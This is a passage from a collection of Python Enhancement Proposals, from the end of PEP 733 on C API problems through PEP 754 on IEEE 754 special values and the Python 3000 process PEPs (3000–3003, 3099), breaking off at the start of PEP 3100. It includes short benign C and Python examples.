duplicated
[Issue 3].
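A small sketch (not from the PEP) of the hazard; recent CPython headers evaluate the argument only once, but code written against older headers had to keep side effects out of the macro argument:

#include <Python.h>

/* Sketch only: with headers where Py_CLEAR expands its argument more
   than once, an argument with side effects (such as objs[i++]) would
   be evaluated twice; keeping the side effect outside the macro is safe. */
static void
clear_all(PyObject **objs, Py_ssize_t n)
{
    for (Py_ssize_t i = 0; i < n; i++) {
        Py_CLEAR(objs[i]);
    }
}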
The meaning of Py_SIZE depends on the type and is not always
reliable
[Issue 10].
Some API functions do not have the same behaviour as their Python
equivalents. The behaviour of PyIter_Next is different from
tp_iternext.
[Issue 29].
The behaviour of PySet_Contains is different from set.__contains__
[Issue 6].
The fact that PyArg_ParseTupleAndKeywords takes a non-const
char* array as argument makes it more difficult to use
[Issue 28].
Python.h does not expose the whole API. Some headers (like marshal.h)
are not included from Python.h.
[Issue 43].
Naming
PyLong and PyUnicode use names which no longer match the Python
types they represent (int/str). This could be fixed in a new API
[Issue 14].
There are identifiers in the API which are lacking a Py/_Py
prefix
[Issue 46].
Missing Functionality
This section consists of a list of feature requests, i.e., functionality
that was identified as missing in the current C API.
Debug Mode
A debug mode that can be activated without recompilation and which
activates various checks that can help detect various types of errors
[Issue 36].
Introspection
There aren’t currently reliable introspection capabilities for objects
defined in C in the same way as there are for Python objects
[Issue 32].
Efficient type checking for heap types
[Issue 17].
Improved Interaction with Other Languages
Interfacing with other GC based languages, and integrating their
GC with Python’s GC
[Issue 19].
Inject foreign stack frames to the traceback
[Issue 18].
Concrete strings that can be used in other languages
[Issue 16].
References
Python/C API Reference Manual
2023 Language Summit Blog Post: Three Talks on the C API
capi-workgroup on GitHub
Irit’s Core Sprint 2023 slides about C API workgroup
Petr’s Core Sprint 2023 slides
HPy team’s Core Sprint 2023 slides for Things to Learn from HPy
Victor’s slides of Core Sprint 2023 Python C API talk
The Python’s stability promise — Cristián Maureira-Fredes, PySide maintainer
Report on the issues PySide had 5 years ago when switching to the stable ABI
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Draft | PEP 733 – An Evaluation of Python’s Public C API | Informational | This informational PEP describes our shared view of the public C API. The
document defines: |
PEP 754 – IEEE 754 Floating Point Special Values
Author:
Gregory R. Warnes <gregory_r_warnes at groton.pfizer.com>
Status:
Rejected
Type:
Standards Track
Created:
28-Mar-2003
Python-Version:
2.3
Post-History:
Table of Contents
Rejection Notice
Abstract
Rationale
API Definition
Constants
Functions
Example
Implementation
References
Copyright
Rejection Notice
This PEP has been rejected. After sitting open for four years, it has
failed to generate sufficient community interest.
Several ideas of this PEP were implemented for Python 2.6. float('inf')
and repr(float('inf')) are now guaranteed to work on every supported
platform with IEEE 754 semantics. However the eval(repr(float('inf')))
roundtrip is still not supported unless you define inf and nan yourself:
>>> inf = float('inf')
>>> inf, 1E400
(inf, inf)
>>> neginf = float('-inf')
>>> neginf, -1E400
(-inf, -inf)
>>> nan = float('nan')
>>> nan, inf * 0.
(nan, nan)
The math and sys modules have also gained additional features:
sys.float_info, math.isinf, math.isnan, math.copysign.
Abstract
This PEP proposes an API and provides a reference module that
generates and tests for IEEE 754 double-precision special values:
positive infinity, negative infinity, and not-a-number (NaN).
Rationale
The IEEE 754 standard defines a set of binary representations and
algorithmic rules for floating point arithmetic. Included in the
standard is a set of constants for representing special values,
including positive infinity, negative infinity, and indeterminate or
non-numeric results (NaN). Most modern CPUs implement the
IEEE 754 standard, including the (Ultra)SPARC, PowerPC, and x86
processor series.
Currently, the handling of IEEE 754 special values in Python depends
on the underlying C library. Unfortunately, there is little
consistency between C libraries in how or whether these values are
handled. For instance, on some systems “float(‘Inf’)” will properly
return the IEEE 754 constant for positive infinity. On many systems,
however, this expression will instead generate an error message.
The output string representation for an IEEE 754 special value also
varies by platform. For example, the expression “float(1e3000)”,
which is large enough to generate an overflow, should return a string
representation corresponding to IEEE 754 positive infinity. Python
2.1.3 on x86 Debian Linux returns “inf”. On Sparc Solaris 8 with
Python 2.2.1, this same expression returns “Infinity”, and on
MS-Windows 2000 with Active Python 2.2.1, it returns “1.#INF”.
Adding to the confusion, some platforms generate one string on
conversion from floating point and accept a different string for
conversion to floating point. On these systems
float(str(x))
will generate an error when “x” is an IEEE special value.
In the past, some have recommended that programmers use expressions
like:
PosInf = 1e300**2
NaN = PosInf/PosInf
to obtain positive infinity and not-a-number constants. However, the
first expression generates an error on current Python interpreters. A
possible alternative is to use:
PosInf = 1e300000
NaN = PosInf/PosInf
While this does not generate an error with current Python
interpreters, it is still an ugly and potentially non-portable hack.
In addition, defining NaN in this way does not solve the problem of
detecting such values. First, the IEEE 754 standard provides for an
entire set of constant values for Not-a-Number. Second, the standard
requires that
NaN != X
for all possible values of X, including NaN. As a consequence
NaN == NaN
should always evaluate to false. However, this behavior also is not
consistently implemented. [e.g. Cygwin Python 2.2.2]
Due to the many platform and library inconsistencies in handling IEEE
special values, it is impossible to consistently set or detect IEEE
754 floating point values in normal Python code without resorting to
directly manipulating bit-patterns.
This PEP proposes a standard Python API and provides a reference
module implementation which allows for consistent handling of IEEE 754
special values on all supported platforms.
API Definition
Constants
NaN: Non-signalling IEEE 754 “Not a Number” value
PosInf: IEEE 754 Positive Infinity value
NegInf: IEEE 754 Negative Infinity value
Functions
isNaN(value): Determine if the argument is an IEEE 754 NaN (Not a Number) value.
isPosInf(value): Determine if the argument is an IEEE 754 positive infinity value.
isNegInf(value): Determine if the argument is an IEEE 754 negative infinity value.
isFinite(value): Determine if the argument is a finite IEEE 754 value (i.e., is
not NaN, positive infinity, or negative infinity).
isInf(value): Determine if the argument is an infinite IEEE 754 value (positive
or negative infinity).
Example
(Run under Python 2.2.1 on Solaris 8.)
>>> import fpconst
>>> val = 1e30000 # should cause overflow and result in "Inf"
>>> val
Infinity
>>> fpconst.isInf(val)
1
>>> fpconst.PosInf
Infinity
>>> nval = val/val # should result in NaN
>>> nval
NaN
>>> fpconst.isNaN(nval)
1
>>> fpconst.isNaN(val)
0
Implementation
The reference implementation is provided in the module “fpconst” [1],
which is written in pure Python by taking advantage of the “struct”
standard module to directly set or test for the bit patterns that
define IEEE 754 special values. Care has been taken to generate
proper results on both big-endian and little-endian machines. The
current implementation is pure Python, but some efficiency could be
gained by translating the core routines into C.
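As a rough illustration only (these helpers are invented here; the reference module itself is the pure-Python fpconst), such a C core routine could test the bit patterns directly, since a double is NaN exactly when its exponent bits are all ones and its mantissa is non-zero:

#include <stdint.h>
#include <string.h>

/* Sketch only: inspect the 64-bit pattern of an IEEE 754 double.
   Exponent bits all ones + non-zero mantissa = NaN;
   exponent bits all ones + zero mantissa = infinity. */
static int is_ieee754_nan(double x)
{
    uint64_t bits;
    memcpy(&bits, &x, sizeof bits);
    uint64_t exponent = (bits >> 52) & 0x7FF;
    uint64_t mantissa = bits & ((UINT64_C(1) << 52) - 1);
    return exponent == 0x7FF && mantissa != 0;
}

static int is_ieee754_inf(double x)
{
    uint64_t bits;
    memcpy(&bits, &x, sizeof bits);
    /* clear the sign bit and compare against the +infinity pattern */
    return (bits & UINT64_C(0x7FFFFFFFFFFFFFFF)) == UINT64_C(0x7FF0000000000000);
}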
Patch 1151323 “New fpconst module” [2] on SourceForge adds the
fpconst module to the Python standard library.
References
See http://babbage.cs.qc.edu/courses/cs341/IEEE-754references.html for
reference material on the IEEE 754 floating point standard.
[1]
Further information on the reference package is available at
http://research.warnes.net/projects/rzope/fpconst/
[2]
http://sourceforge.net/tracker/?func=detail&aid=1151323&group_id=5470&atid=305470
Copyright
This document has been placed in the public domain.
| Rejected | PEP 754 – IEEE 754 Floating Point Special Values | Standards Track | This PEP proposes an API and provides a reference module that
generates and tests for IEEE 754 double-precision special values:
positive infinity, negative infinity, and not-a-number (NaN). |
PEP 801 – Reserved
Author:
Barry Warsaw <barry at python.org>
Status:
Active
Type:
Informational
Created:
21-Jun-2018
Table of Contents
Abstract
Copyright
Abstract
This PEP is reserved for future use, because
We are the 801.
Contact the author for details.
Copyright
This document has been placed in the public domain.
| Active | PEP 801 – Reserved | Informational | This PEP is reserved for future use, because
We are the 801.
Contact the author for details. |
PEP 3000 – Python 3000
Author:
Guido van Rossum <guido at python.org>
Status:
Final
Type:
Process
Created:
05-Apr-2006
Post-History:
Table of Contents
Abstract
Naming
PEP Numbering
Timeline
Compatibility and Transition
Implementation Language
Meta-Contributions
References
Copyright
Abstract
This PEP sets guidelines for Python 3000 development. Ideally, we
first agree on the process, and start discussing features only after
the process has been decided and specified. In practice, we’ll be
discussing features and process simultaneously; often the debate about
a particular feature will prompt a process discussion.
Naming
Python 3000, Python 3.0 and Py3K are all names for the same thing.
The project is called Python 3000, or abbreviated to Py3k. The actual
Python release will be referred to as Python 3.0, and that’s
what “python3.0 -V” will print; the actual file names will use the
same naming convention we use for Python 2.x. I don’t want to pick a
new name for the executable or change the suffix for Python source
files.
PEP Numbering
Python 3000 PEPs are numbered starting at PEP 3000. PEPs 3000-3099
are meta-PEPs – these can be either process or informational PEPs.
PEPs 3100-3999 are feature PEPs. PEP 3000 itself (this PEP) is
special; it is the meta-PEP for Python 3000 meta-PEPs (IOW it describes
the process to define processes). PEP 3100 is also special; it’s a
laundry list of features that were selected for (hopeful) inclusion in
Python 3000 before we started the Python 3000 process for real. PEP
3099, finally, is a list of features that will not change.
Timeline
See PEP 361, which contains the release schedule for Python
2.6 and 3.0. These versions will be released in lockstep.
Note: standard library development is expected to ramp up after 3.0a1
is released.
I expect that there will be parallel Python 2.x and 3.x releases for
some time; the Python 2.x releases will continue for a longer time
than the traditional 2.x.y bugfix releases. Typically, we stop
releasing bugfix versions for 2.x once version 2.(x+1) has been
released. But I expect there to be at least one or two new 2.x
releases even after 3.0 (final) has been released, probably well into
3.1 or 3.2. This will to some extent depend on community demand for
continued 2.x support, acceptance and stability of 3.0, and volunteer
stamina.
I expect that Python 3.1 and 3.2 will be released much sooner after
3.0 than has been customary for the 2.x series. The 3.x release
pattern will stabilize once the community is happy with 3.x.
Compatibility and Transition
Python 3.0 will break backwards compatibility with Python 2.x.
There is no requirement that Python 2.6 code will run unmodified on
Python 3.0. Not even a subset. (Of course there will be a tiny
subset, but it will be missing major functionality.)
Python 2.6 will support forward compatibility in the following two
ways:
It will support a “Py3k warnings mode” which will warn dynamically
(i.e. at runtime) about features that will stop working in Python
3.0, e.g. assuming that range() returns a list.
It will contain backported versions of many Py3k features, either
enabled through __future__ statements or simply by allowing old and
new syntax to be used side-by-side (if the new syntax would be a
syntax error in 2.x).
Instead, and complementary to the forward compatibility features in
2.6, there will be a separate source code conversion tool [1]. This
tool can do a context-free source-to-source translation. For example,
it can translate apply(f, args) into f(*args). However, the
tool cannot do data flow analysis or type inferencing, so it simply
assumes that apply in this example refers to the old built-in
function.
The recommended development model for a project that needs to support
Python 2.6 and 3.0 simultaneously is as follows:
You should have excellent unit tests with close to full coverage.
Port your project to Python 2.6.
Turn on the Py3k warnings mode.
Test and edit until no warnings remain.
Use the 2to3 tool to convert this source code to 3.0 syntax.
Do not manually edit the output!
Test the converted source code under 3.0.
If problems are found, make corrections to the 2.6 version
of the source code and go back to step 3.
When it’s time to release, release separate 2.6 and 3.0 tarballs
(or whatever archive form you use for releases).
It is recommended not to edit the 3.0 source code until you are ready
to reduce 2.6 support to pure maintenance (i.e. the moment when you
would normally move the 2.6 code to a maintenance branch anyway).
PS. We need a meta-PEP to describe the transitional issues in detail.
Implementation Language
Python 3000 will be implemented in C, and the implementation will be
derived as an evolution of the Python 2 code base. This reflects my
views (which I share with Joel Spolsky [2]) on the dangers of complete
rewrites. Since Python 3000 as a language is a relatively mild
improvement on Python 2, we can gain a lot by not attempting to
reimplement the language from scratch. I am not against parallel
from-scratch implementation efforts, but my own efforts will be
directed at the language and implementation that I know best.
Meta-Contributions
Suggestions for additional text for this PEP are gracefully accepted
by the author. Draft meta-PEPs for the topics above and additional
topics are even more welcome!
References
[1]
The 2to3 tool, in the subversion sandbox
http://svn.python.org/view/sandbox/trunk/2to3/
[2]
Joel on Software: Things You Should Never Do, Part I
http://www.joelonsoftware.com/articles/fog0000000069.html
Copyright
This document has been placed in the public domain.
| Final | PEP 3000 – Python 3000 | Process | This PEP sets guidelines for Python 3000 development. Ideally, we
first agree on the process, and start discussing features only after
the process has been decided and specified. In practice, we’ll be
discussing features and process simultaneously; often the debate about
a particular feature will prompt a process discussion. |
PEP 3001 – Procedure for reviewing and improving standard library modules
Author:
Georg Brandl <georg at python.org>
Status:
Withdrawn
Type:
Process
Created:
05-Apr-2006
Post-History:
Table of Contents
Abstract
Removal of obsolete modules
Renaming modules
Code cleanup
Enhancement of test and documentation coverage
Unification of module metadata
Backwards incompatible bug fixes
Interface changes
References
Copyright
Abstract
This PEP describes a procedure for reviewing and improving standard
library modules, especially those written in Python, making them ready
for Python 3000. There can be different steps of refurbishing, each
of which is described in a section below. Of course, not every step
has to be performed for every module.
Removal of obsolete modules
All modules marked as deprecated in 2.x versions should be removed for
Python 3000. The same applies to modules which are seen as obsolete today,
but are too widely used to be deprecated or removed. Python 3000 is the
big occasion to get rid of them.
There will have to be a document listing all removed modules, together
with information on possible substitutes or alternatives. This
information will also have to be provided by the python3warn.py porting
helper script mentioned in PEP XXX.
Renaming modules
There are proposals for a “great stdlib renaming” introducing a hierarchic
library namespace or a top-level package from which to import standard
modules. That possibility aside, some modules’ names are known to have
been chosen unwisely, a mistake which could never be corrected in the 2.x
series. Examples are names like “StringIO” or “Cookie”. For Python 3000,
there will be the possibility to give those modules less confusing and
more conforming names.
Of course, each rename will have to be stated in the documentation of
the respective module and perhaps in the global document of Step 1.
Additionally, the python3warn.py script will recognize the old module
names and notify the user accordingly.
If the name change is made in time for another release of the Python 2.x
series, it is worth considering to introduce the new name in the 2.x
branch to ease transition.
Code cleanup
As most library modules written in Python have not been touched except
for bug fixes, following the policy of never changing a running system,
many of them may contain code that is not up to the newest language
features and could be rewritten in a more concise, modern Python.
PyChecker should run cleanly over the library. With a carefully tuned
configuration file, PyLint should also emit as few warnings as possible.
As long as these changes don’t change the module’s interface and behavior,
no documentation updates are necessary.
Enhancement of test and documentation coverage
Code coverage by unit tests varies greatly between modules. Each test
suite should be checked for completeness, and the remaining classic tests
should be converted to PyUnit (or whatever new shiny testing framework
comes with Python 3000, perhaps py.test?).
It should also be verified that each publicly visible function has a
meaningful docstring which ideally contains several doctests.
No documentation changes are necessary for enhancing test coverage.
Unification of module metadata
This is a small and probably not very important step. There have been
various attempts at providing author, version and similar metadata in
modules (such as a “__version__” global). Those could be standardized
and used throughout the library.
No documentation changes are necessary for this step either.
Backwards incompatible bug fixes
Over the years, many bug reports have been filed which complained about
bugs in standard library modules, but have subsequently been closed as
“Won’t fix” since a fix would have introduced a major incompatibility
which was not acceptable in the Python 2.x series. In Python 3000, the
fix can be applied if the interface per se is still acceptable.
Each slight behavioral change caused by such fixes must be mentioned in
the documentation, perhaps in a “Changed in Version 3.0” paragraph.
Interface changes
The last and most disruptive change is the overhaul of a module’s public
interface. If a module’s interface is to be changed, a justification
should be made beforehand, or a PEP should be written.
The change must be fully documented as “New in Version 3.0”, and the
python3warn.py script must know about it.
References
None yet.
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 3001 – Procedure for reviewing and improving standard library modules | Process | This PEP describes a procedure for reviewing and improving standard
library modules, especially those written in Python, making them ready
for Python 3000. There can be different steps of refurbishing, each
of which is described in a section below. Of course, not every step
has to be performed for every module. |
PEP 3002 – Procedure for Backwards-Incompatible Changes
Author:
Steven Bethard <steven.bethard at gmail.com>
Status:
Final
Type:
Process
Created:
27-Mar-2006
Post-History:
27-Mar-2006, 13-Apr-2006
Table of Contents
Abstract
Rationale
Python Enhancement Proposals
Identifying Problematic Code
References
Copyright
Abstract
This PEP describes the procedure for changes to Python that are
backwards-incompatible between the Python 2.X series and Python 3000.
All such changes must be documented by an appropriate Python 3000 PEP
and must be accompanied by code that can identify when pieces of
Python 2.X code may be problematic in Python 3000.
Rationale
Python 3000 will introduce a number of backwards-incompatible changes
to Python, mainly to streamline the language and to remove some
previous design mistakes. But Python 3000 is not intended to be a new
and completely different language from the Python 2.X series, and it
is expected that much of the Python user community will make the
transition to Python 3000 when it becomes available.
To encourage this transition, it is crucial to provide a clear and
complete guide on how to upgrade Python 2.X code to Python 3000 code.
Thus, for any backwards-incompatible change, two things are required:
An official Python Enhancement Proposal (PEP)
Code that can identify pieces of Python 2.X code that may be
problematic in Python 3000
Python Enhancement Proposals
Every backwards-incompatible change must be accompanied by a PEP.
This PEP should follow the usual PEP guidelines and explain the
purpose and reasoning behind the backwards incompatible change. In
addition to the usual PEP sections, all PEPs proposing
backwards-incompatible changes must include an additional section:
Compatibility Issues. This section should describe what is backwards
incompatible about the proposed change to Python, and the major sorts
of breakage to be expected.
While PEPs must still be evaluated on a case-by-case basis, a PEP may
be inappropriate for Python 3000 if its Compatibility Issues section
implies any of the following:
Most or all instances of a Python 2.X construct are incorrect in
Python 3000, and most or all instances of the Python 3000 construct
are incorrect in Python 2.X. So, for example, changing the meaning of the for-loop else-clause
from “executed when the loop was not broken out of” to “executed
when the loop had zero iterations” would mean that all Python 2.X
for-loop else-clauses would be broken, and there would be no way to
use a for-loop else-clause in a Python-3000-appropriate manner.
Thus a PEP for such an idea would likely be rejected.
Many instances of a Python 2.X construct are incorrect in Python
3000 and the PEP fails to demonstrate real-world use-cases for the
changes. Backwards incompatible changes are allowed in Python 3000, but not
to excess. A PEP that proposes backwards-incompatible changes
should provide good examples of code that visibly benefits from the
changes.
PEP-writing is time-consuming, so when a number of
backwards-incompatible changes are closely related, they should be
proposed in the same PEP. Such PEPs will likely have longer
Compatibility Issues sections, however, since they must now describe
the sorts of breakage expected from all the proposed changes.
Identifying Problematic Code
In addition to the PEP requirement, backwards incompatible changes to
Python must also be accompanied by code to issue warnings for pieces
of Python 2.X code that will behave differently in Python 3000. Such
warnings will be enabled in Python 2.X using a new command-line
switch: -3. All backwards incompatible changes should be
accompanied by a patch for Python 2.X that, when -3 is
specified, issues warnings for each construct that is being changed.
For example, if dict.keys() returns an iterator in Python 3000,
the patch to the Python 2.X branch should do something like:
If -3 was specified, change dict.keys() to return a
subclass of list that issues warnings whenever you use any
methods other than __iter__().
Such a patch would mean that warnings are only issued when features
that will not be present in Python 3000 are used, and almost all
existing code should continue to work. (Code that relies on
dict.keys() always returning a list and not a subclass should
be pretty much non-existent.)
References
TBD
Copyright
This document has been placed in the public domain.
| Final | PEP 3002 – Procedure for Backwards-Incompatible Changes | Process | This PEP describes the procedure for changes to Python that are
backwards-incompatible between the Python 2.X series and Python 3000.
All such changes must be documented by an appropriate Python 3000 PEP
and must be accompanied by code that can identify when pieces of
Python 2.X code may be problematic in Python 3000. |
PEP 3003 – Python Language Moratorium
Author:
Brett Cannon, Jesse Noller, Guido van Rossum
Status:
Final
Type:
Process
Created:
21-Oct-2009
Post-History:
03-Nov-2009
Table of Contents
Abstract
Rationale
Details
Cannot Change
Case-by-Case Exemptions
Allowed to Change
Retroactive
Extensions
Copyright
References
Abstract
This PEP proposes a temporary moratorium (suspension) of all changes
to the Python language syntax, semantics, and built-ins for a period
of at least two years from the release of Python 3.1. In particular, the
moratorium would include Python 3.2 (to be released 18-24 months after
3.1) but allow Python 3.3 (assuming it is not released prematurely) to
once again include language changes.
This suspension of features is designed to allow non-CPython implementations
to “catch up” to the core implementation of the language, help ease adoption
of Python 3.x, and provide a more stable base for the community.
Rationale
This idea was proposed by Guido van Rossum on the python-ideas [1] mailing
list. The premise of his email was to slow the alteration of the Python core
syntax, builtins and semantics to allow non-CPython implementations to catch
up to the current state of Python, both 2.x and 3.x.
Python, as a language, is more than the core implementation –
CPython – with a rich, mature and vibrant community of implementations, such
as Jython [2], IronPython [3] and PyPy [4] that are a benefit not only to
the community, but to the language itself.
Still others, such as Unladen Swallow [5] (a branch of CPython) seek not to
create an alternative implementation, but rather they seek to enhance the
performance and implementation of CPython itself.
Python 3.x was a large part of the last several years of Python’s
development. Its release, as well as a bevy of changes to the language
introduced by it and the previous 2.6.x releases, puts alternative
implementations at a severe disadvantage in “keeping pace” with core python
development.
Additionally, many of the changes put into the recent releases of the language
as implemented by CPython have not yet seen widespread usage by the
general user population. For example, most users are limited to the version
of the interpreter (typically CPython) which comes pre-installed with their
operating system. Most OS vendors are just barely beginning to ship Python 2.6
– even fewer are shipping Python 3.x.
As it is expected that Python 2.7 will be the effective “end of life” of the Python
2.x code line, with Python 3.x being the future, it is in the best interest of
Python core development to temporarily suspend the alteration of the language
itself to allow all of these external entities to catch up and to assist in
the adoption of, and migration to, Python 3.x.
Finally, the moratorium is intended to free up cycles within core development
to focus on other issues, such as the CPython interpreter and improvements
therein, the standard library, etc.
This moratorium does not allow for exceptions – once accepted, any pending
changes to the syntax or semantics of the language will be postponed until the
moratorium is lifted.
This moratorium does not attempt to apply to any other Python implementation
meaning that if desired other implementations may add features which deviate
from the standard implementation.
Details
Cannot Change
New built-ins
Language syntax: The grammar file essentially becomes immutable apart from ambiguity
fixes.
General language semantics: The language operates as-is with only specific exemptions (see
below).
New __future__ imports: These are explicitly forbidden, as they effectively change the language
syntax and/or semantics (albeit using a compiler directive).
Case-by-Case Exemptions
New methods on built-ins: The case for adding a method to a built-in object can be made.
Incorrect language semantics: If the language semantics turn out to be ambiguous or improperly
implemented based on the intention of the original design then the
semantics may change.
Language semantics that are difficult to implement: Because other VMs have not begun implementing Python 3.x semantics
there is a possibility that certain semantics are too difficult to
replicate. In those cases they can be changed to ease adoption of
Python 3.x by the other VMs.
Allowed to Change
C API: It is entirely acceptable to change the underlying C code of
CPython as long as other restrictions of this moratorium are not
broken. E.g. removing the GIL would be fine assuming certain
operations that are currently atomic remain atomic.
The standard library: As the standard library is not directly tied to the language
definition it is not covered by this moratorium.
Backports of 3.x features to 2.x: The moratorium only affects features that would be new in 3.x.
Import semantics: For example, PEP 382. After all, import semantics vary between
Python implementations anyway.
Retroactive
It is important to note that the moratorium covers all changes since the release
of Python 3.1. This rule is intended to avoid features being rushed or smuggled
into the CPython source tree while the moratorium is being discussed. A review
of the NEWS file for the py3k development branch showed no commits would need to
be rolled back in order to meet this goal.
Extensions
The time period of the moratorium can only be extended through a new PEP.
Copyright
This document has been placed in the public domain.
References
[1]
https://mail.python.org/pipermail/python-ideas/2009-October/006305.html
[2]
http://www.jython.org/
[3]
http://www.codeplex.com/IronPython
[4]
http://codespeak.net/pypy/
[5]
http://code.google.com/p/unladen-swallow/
| Final | PEP 3003 – Python Language Moratorium | Process | This PEP proposes a temporary moratorium (suspension) of all changes
to the Python language syntax, semantics, and built-ins for a period
of at least two years from the release of Python 3.1. In particular, the
moratorium would include Python 3.2 (to be released 18-24 months after
3.1) but allow Python 3.3 (assuming it is not released prematurely) to
once again include language changes. |
PEP 3099 – Things that will Not Change in Python 3000
Author:
Georg Brandl <georg at python.org>
Status:
Final
Type:
Process
Created:
04-Apr-2006
Post-History:
Table of Contents
Abstract
Core language
Builtins
Standard types
Coding style
Interactive Interpreter
Copyright
Abstract
Some ideas are just bad. While some thoughts on Python evolution are
constructive, some go against the basic tenets of Python so
egregiously that it would be like asking someone to run in a circle:
it gets you nowhere, even for Python 3000, where extraordinary
proposals are allowed. This PEP tries to list all BDFL pronouncements
on Python 3000 that refer to changes that will not happen and new
features that will not be introduced, sorted by topics, along with
a short explanation or a reference to the relevant thread on the
python-3000 mailing list.
If you think you should suggest any of the listed ideas it would be
better to just step away from the computer, go outside, and enjoy
yourself. Being active outdoors by napping in a nice patch of grass
is more productive than bringing up a beating-a-dead-horse idea and
having people tell you how dead the idea is. Consider yourself warned.
Core language
Python 3000 will not be case-insensitive.
Python 3000 will not be a rewrite from scratch.
It will also not use C++ or another language different from C
as implementation language. Rather, there will be a gradual
transmogrification of the codebase. There’s an excellent essay
by Joel Spolsky explaining why:
http://www.joelonsoftware.com/articles/fog0000000069.html
self will not become implicit.
Having self be explicit is a good thing. It makes the code
clear by removing ambiguity about how a variable resolves. It also
makes the difference between functions and methods small.
Thread: “Draft proposal: Implicit self in Python 3.0”
https://mail.python.org/pipermail/python-dev/2006-January/059468.html
lambda will not be renamed.
At one point lambda was slated for removal in Python 3000.
Unfortunately no one was able to come up with a better way of
providing anonymous functions. And so lambda is here to stay.
But it is here to stay as-is. Adding support for statements is a
non-starter. It would require allowing multi-line lambda
expressions which would mean a multi-line expression could suddenly
exist. That would allow for multi-line arguments to function
calls, for instance. That is just plain ugly.
Thread: “genexp syntax / lambda”,
https://mail.python.org/pipermail/python-3000/2006-April/001042.html
Python will not have programmable syntax.
Thread: “It’s a statement! It’s a function! It’s BOTH!”,
https://mail.python.org/pipermail/python-3000/2006-April/000286.html
There won’t be a syntax for zip()-style parallel iteration.
Thread: “Parallel iteration syntax”,
https://mail.python.org/pipermail/python-3000/2006-March/000210.html
Strings will stay iterable.
Thread: “Making strings non-iterable”,
https://mail.python.org/pipermail/python-3000/2006-April/000759.html
There will be no syntax to sort the result of a generator expression
or list comprehension. sorted() covers all use cases.
Thread: “Adding sorting to generator comprehension”,
https://mail.python.org/pipermail/python-3000/2006-April/001295.html
Slices and extended slices won’t go away (even if the __getslice__
and __setslice__ APIs may be replaced) nor will they return views
for the standard object types.
Thread: Future of slices
https://mail.python.org/pipermail/python-3000/2006-May/001563.html
It will not be forbidden to reuse a loop variable inside the loop’s
suite.
Thread: elimination of scope bleeding of iteration variables
https://mail.python.org/pipermail/python-dev/2006-May/064761.html
The parser won’t be more complex than LL(1).
Simple is better than complex. This idea extends to the parser.
Restricting Python’s grammar to an LL(1) parser is a blessing,
not a curse. It puts us in handcuffs that prevent us from going
overboard and ending up with funky grammar rules like some other
dynamic languages that will go unnamed, such as Perl.
No braces.
This is so obvious that it doesn’t need a reference to a mailing
list. Do from __future__ import braces to get a definitive
answer on this subject.
No more backticks.
Backticks (`) will no longer be used as shorthand for repr –
but that doesn’t mean they are available for other uses. Even
ignoring the backwards compatibility confusion, the character
itself causes too many problems (in some fonts, on some keyboards,
when typesetting a book, etc).
Thread: “new operators via backquoting”,
https://mail.python.org/pipermail/python-ideas/2007-January/000054.html
Referencing the global name foo will not be spelled globals.foo.
The global statement will stay.
Threads: “replace globals() and global statement with global builtin
object”,
https://mail.python.org/pipermail/python-3000/2006-July/002485.html,
“Explicit Lexical Scoping (pre-PEP?)”,
https://mail.python.org/pipermail/python-dev/2006-July/067111.html
There will be no alternative binding operators such as :=.
Thread: “Explicit Lexical Scoping (pre-PEP?)”,
https://mail.python.org/pipermail/python-dev/2006-July/066995.html
We won’t be removing container literals.
That is, {expr: expr, …}, [expr, …] and (expr, …) will stay.
Thread: “No Container Literals”,
https://mail.python.org/pipermail/python-3000/2006-July/002550.html
The else clause in while and for loops will not change
semantics, or be removed.
Thread: “for/except/else syntax”
https://mail.python.org/pipermail/python-ideas/2009-October/006083.html
Builtins
zip() won’t grow keyword arguments or other mechanisms to prevent
it from stopping at the end of the shortest sequence.
Thread: “have zip() raise exception for sequences of different lengths”,
https://mail.python.org/pipermail/python-3000/2006-August/003338.html
hash() won’t become an attribute since attributes should be cheap
to compute, which isn’t necessarily the case for a hash.
Thread: “hash as attribute/property”,
https://mail.python.org/pipermail/python-3000/2006-April/000362.html
Standard types
Iterating over a dictionary will continue to yield the keys.
Thread: “Iterating over a dict”,
https://mail.python.org/pipermail/python-3000/2006-April/000283.html
Thread: “have iter(mapping) generate (key, value) pairs”,
https://mail.python.org/pipermail/python-3000/2006-June/002368.html
There will be no frozenlist type.
Thread: “Immutable lists”,
https://mail.python.org/pipermail/python-3000/2006-May/002219.html
int will not support subscripts yielding a range.
Thread: “xrange vs. int.__getslice__”,
https://mail.python.org/pipermail/python-3000/2006-June/002450.html
Coding style
The (recommended) maximum line width will remain 80 characters,
for both C and Python code.
Thread: “C style guide”,
https://mail.python.org/pipermail/python-3000/2006-March/000131.html
Interactive Interpreter
The interpreter prompt (>>>) will not change. It gives Guido warm
fuzzy feelings.
Thread: “Low-hanging fruit: change interpreter prompt?”,
https://mail.python.org/pipermail/python-3000/2006-November/004891.html
Copyright
This document has been placed in the public domain.
| Final | PEP 3099 – Things that will Not Change in Python 3000 | Process | Some ideas are just bad. While some thoughts on Python evolution are
constructive, some go against the basic tenets of Python so
egregiously that it would be like asking someone to run in a circle:
it gets you nowhere, even for Python 3000, where extraordinary
proposals are allowed. This PEP tries to list all BDFL pronouncements
on Python 3000 that refer to changes that will not happen and new
features that will not be introduced, sorted by topics, along with
a short explanation or a reference to the relevant thread on the
python-3000 mailing list. |
PEP 3100 – Miscellaneous Python 3.0 Plans
Author:
Brett Cannon <brett at python.org>
Status:
Final
Type:
Process
Created:
20-Aug-2004
Post-History:
Table of Contents
Abstract
General goals
Influencing PEPs
Style changes
Core language
Atomic Types
Built-in Namespace
Standard library
Outstanding Issues
References
Copyright
Abstract
This PEP, previously known as PEP 3000, describes smaller scale changes
and new features for which no separate PEP is written yet, all targeted
for Python 3000.
The list of features included in this document is subject to change
and isn’t binding on the Python development community; features may be
added, removed, and modified at any time. The purpose of this list is
to focus our language development effort on changes that are steps to
3.0, and to encourage people to invent ways to smooth the transition.
This document is not a wish-list that anyone can extend. While there
are two authors of this PEP, we’re just supplying the text; the
decisions for which changes are listed in this document are made by
Guido van Rossum, who has chosen them as goals for Python 3.0.
Guido’s pronouncements on things that will not change in Python 3.0
are recorded in PEP 3099.
General goals
A general goal is to reduce feature duplication by removing old ways
of doing things. A general principle of the design will be that one
obvious way of doing something is enough. [1]
Influencing PEPs
PEP 238 (Changing the Division Operator)
PEP 328 (Imports: Multi-Line and Absolute/Relative)
PEP 343 (The “with” Statement)
PEP 352 (Required Superclass for Exceptions)
Style changes
The C style guide will be updated to use 4-space indents, never tabs.
